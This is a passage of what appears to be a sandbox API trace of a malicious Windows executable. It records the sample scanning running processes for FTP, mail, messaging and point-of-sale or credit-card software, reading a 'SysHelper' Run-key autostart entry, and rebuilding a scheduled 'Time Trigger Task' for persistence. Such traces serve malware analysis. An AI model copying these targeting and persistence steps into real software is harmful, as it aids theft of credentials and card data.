hProcess=0x554, hModule=0xe20000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0156.626] CloseHandle (hObject=0x554) returned 1 [0156.626] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x25c) returned 0x554 [0156.626] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.627] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xb10000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0156.627] CloseHandle (hObject=0x554) returned 1 [0156.627] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x598) returned 0x554 [0156.627] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.628] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x160000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0156.629] CloseHandle (hObject=0x554) returned 1 [0156.629] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x35c) returned 0x554 [0156.629] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.630] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x3e0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0156.631] CloseHandle (hObject=0x554) returned 1 [0156.631] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x434) returned 0x554 [0156.631] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.632] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x800000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0156.633] CloseHandle (hObject=0x554) returned 1 [0156.633] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c4) returned 0x554 [0156.633] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.635] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xb50000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0156.635] CloseHandle (hObject=0x554) returned 1 [0156.635] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5dc) returned 0x554 [0156.635] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.637] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x11b0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0156.637] CloseHandle (hObject=0x554) returned 1 [0156.637] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3d4) returned 0x554 [0156.637] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.639] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xa00000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0156.639] CloseHandle (hObject=0x554) returned 1 [0156.639] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4e4) returned 0x554 [0156.639] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.640] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xf10000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0156.640] CloseHandle (hObject=0x554) returned 1 [0156.640] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6dc) returned 0x554 [0156.640] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.642] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xaf0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0156.642] CloseHandle (hObject=0x554) returned 1 [0156.642] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7b4) returned 0x554 [0156.642] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.643] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xeb0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0156.643] CloseHandle (hObject=0x554) returned 1 [0156.643] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x674) returned 0x554 [0156.644] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.645] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xfb0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0156.645] CloseHandle (hObject=0x554) returned 1 [0156.645] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x418) returned 0x554 [0156.645] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.646] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x3d0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0156.647] CloseHandle (hObject=0x554) returned 1 [0156.647] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5c4) returned 0x554 [0156.647] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.648] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xe60000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0156.648] CloseHandle (hObject=0x554) returned 1 [0156.648] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x80c) returned 0x554 [0156.648] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.649] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x160000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0156.649] CloseHandle (hObject=0x554) returned 1 [0156.650] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x81c) returned 0x554 [0156.650] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.651] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x11e0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0156.651] CloseHandle (hObject=0x554) returned 1 [0156.651] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x82c) returned 0x554 [0156.651] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.652] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xba0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0156.652] CloseHandle (hObject=0x554) returned 1 [0156.652] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x83c) returned 0x554 [0156.652] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.654] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x1280000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0156.654] CloseHandle (hObject=0x554) returned 1 [0156.654] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x84c) returned 0x554 [0156.654] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.655] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xf20000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0156.655] CloseHandle (hObject=0x554) returned 1 [0156.655] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x85c) returned 0x554 [0156.655] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.657] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x11c0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0156.657] CloseHandle (hObject=0x554) returned 1 [0156.657] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x86c) returned 0x554 [0156.657] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.658] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x220000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0156.658] CloseHandle (hObject=0x554) returned 1 [0156.659] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x87c) returned 0x554 [0156.659] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.660] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xe70000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0156.660] CloseHandle (hObject=0x554) returned 1 [0156.660] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x88c) returned 0x554 [0156.660] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.661] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x1020000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0156.662] CloseHandle (hObject=0x554) returned 1 [0156.662] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x89c) returned 0x554 [0156.662] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.663] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x220000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0156.663] CloseHandle (hObject=0x554) returned 1 [0156.663] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ac) returned 0x554 [0156.663] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.664] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x90000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0156.664] CloseHandle (hObject=0x554) returned 1 [0156.664] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8bc) returned 0x554 [0156.664] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.666] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x11c0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0156.666] CloseHandle (hObject=0x554) returned 1 [0156.666] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8cc) returned 0x554 [0156.666] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.667] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x1270000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0156.667] CloseHandle (hObject=0x554) returned 1 [0156.667] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e0) returned 0x554 [0156.667] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.668] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x8f0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0156.669] CloseHandle (hObject=0x554) returned 1 [0156.669] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8f4) returned 0x554 [0156.669] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.670] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x1190000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0156.670] CloseHandle (hObject=0x554) returned 1 [0156.670] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x904) returned 0x554 [0156.670] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.671] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xbd0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0156.671] CloseHandle (hObject=0x554) returned 1 [0156.671] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x914) returned 0x554 [0156.672] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.673] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x12e0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0156.673] CloseHandle (hObject=0x554) returned 1 [0156.673] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x924) returned 0x554 [0156.673] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.674] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x11f0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0156.675] CloseHandle (hObject=0x554) returned 1 [0156.675] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x934) returned 0x554 [0156.675] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.676] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xe80000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0156.676] CloseHandle (hObject=0x554) returned 1 [0156.676] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x944) returned 0x554 [0156.676] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.677] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xb70000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0156.677] CloseHandle (hObject=0x554) returned 1 [0156.677] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x954) returned 0x554 [0156.677] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.679] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xcc0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0156.679] CloseHandle (hObject=0x554) returned 1 [0156.679] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x964) returned 0x554 [0156.679] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.680] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xc10000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0156.680] CloseHandle (hObject=0x554) returned 1 [0156.680] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x974) returned 0x554 [0156.680] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.681] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xa20000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0156.682] CloseHandle (hObject=0x554) returned 1 [0156.682] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x984) returned 0x554 [0156.682] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.683] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x1000000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0156.683] CloseHandle (hObject=0x554) returned 1 [0156.683] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x994) returned 0x554 [0156.683] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.684] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x12e0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0156.684] CloseHandle (hObject=0x554) returned 1 [0156.684] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a4) returned 0x554 [0156.685] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.686] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x1b0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="consolidationbeside.exe") returned 0x17 [0156.686] CloseHandle (hObject=0x554) returned 1 [0156.686] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b4) returned 0x554 [0156.686] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.687] GetModuleBaseNameW (in: hProcess=0x554, hModule=0xd70000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="mrs-manitoba.exe") returned 0x10 [0156.687] CloseHandle (hObject=0x554) returned 1 [0156.687] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c4) returned 0x554 [0156.687] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.689] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x12b0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="internationally-seasonal.exe") returned 0x1c [0156.689] CloseHandle (hObject=0x554) returned 1 [0156.689] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f4) returned 0x0 [0156.689] CloseHandle (hObject=0x0) returned 0 [0156.689] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa2c) returned 0x0 [0156.689] CloseHandle (hObject=0x0) returned 0 [0156.689] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x940) returned 0x0 [0156.689] CloseHandle (hObject=0x0) returned 0 [0156.689] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa7c) returned 0x0 [0156.689] CloseHandle (hObject=0x0) returned 0 [0156.689] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7ac) returned 0x0 [0156.689] CloseHandle (hObject=0x0) returned 0 [0156.689] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x738) returned 0x0 [0156.689] CloseHandle (hObject=0x0) returned 0 [0156.690] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c8) returned 0x554 [0156.690] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.691] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x400000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="OnB5h0yX46mreVq4.exe") returned 0x14 [0156.691] CloseHandle (hObject=0x554) returned 1 [0156.691] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa64) returned 0x554 [0156.691] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 0 [0156.691] CloseHandle (hObject=0x554) returned 1 [0156.691] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x900) returned 0x554 [0156.691] EnumProcessModules (in: hProcess=0x554, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0156.692] GetModuleBaseNameW (in: hProcess=0x554, hModule=0x400000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="OnB5h0yX46mreVq4.exe") returned 0x14 [0156.693] CloseHandle (hObject=0x554) returned 1 [0156.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x2e9cc8 [0156.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x39fc898 [0156.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x354b8a0 [0156.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3549c00 [0156.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3a81ae0 [0156.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3a81d48 [0156.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x39f1d18 [0156.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x39f1f80 [0156.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3a01b60 [0156.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3a01dc8 [0156.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3a02030 [0156.693] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18de00 | out: phkResult=0x18de00*=0x554) returned 0x0 [0156.693] RegQueryValueExW (in: hKey=0x554, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18ddfc, lpData=0x18c528, lpcbData=0x18dde0*=0x400 | out: lpType=0x18ddfc*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe\" --AutoStart", lpcbData=0x18dde0*=0xe8) returned 0x0 [0156.693] RegCloseKey (hKey=0x554) returned 0x0 [0156.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf0) returned 0x39f21e8 [0156.693] lstrlenA (lpString="\" --AutoStart") returned 13 [0156.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x389fc8 [0156.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39f21e8 | out: hHeap=0x2c0000) returned 1 [0156.693] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe") returned 1 [0156.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x38a0a0 [0156.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x389fc8 | out: hHeap=0x2c0000) returned 1 [0156.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x389fc8 [0156.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x38a178 [0156.694] CoInitialize (pvReserved=0x0) returned 0x0 [0156.707] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0156.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x39fcb78 [0156.708] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18ddec | out: ppv=0x18ddec*=0x93ff48) returned 0x0 [0156.712] TaskScheduler:ITaskService:Connect (This=0x93ff48, serverName=0x18d878*(varType=0x0, wReserved1=0x77c6, wReserved2=0xe0d2, wReserved3=0x77c6, varVal1=0x67, varVal2=0xd0), user=0x18d888*(varType=0x0, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x0, varVal2=0xd8), domain=0x18d898*(varType=0x0, wReserved1=0x0, wReserved2=0xd0, wReserved3=0x0, varVal1=0x67, varVal2=0x7), password=0x18d8a8*(varType=0x0, wReserved1=0x3a0, wReserved2=0xdd94, wReserved3=0x18, varVal1=0x420cab, varVal2=0x2c0000)) returned 0x0 [0156.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x39f2688 [0156.715] TaskScheduler:ITaskService:GetFolder (in: This=0x93ff48, Path="\\", ppFolder=0x18ddf4 | out: ppFolder=0x18ddf4*=0x2ba08b8) returned 0x0 [0156.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39f2688 | out: hHeap=0x2c0000) returned 1 [0156.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x39f2688 [0156.718] ITaskFolder:DeleteTask (This=0x2ba08b8, Name="Time Trigger Task", flags=0) returned 0x0 [0156.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39f2688 | out: hHeap=0x2c0000) returned 1 [0156.834] TaskScheduler:ITaskService:NewTask (in: This=0x93ff48, flags=0x0, ppDefinition=0x18ddf8 | out: ppDefinition=0x18ddf8*=0x2ba08e8) returned 0x0 [0156.835] TaskScheduler:IUnknown:Release 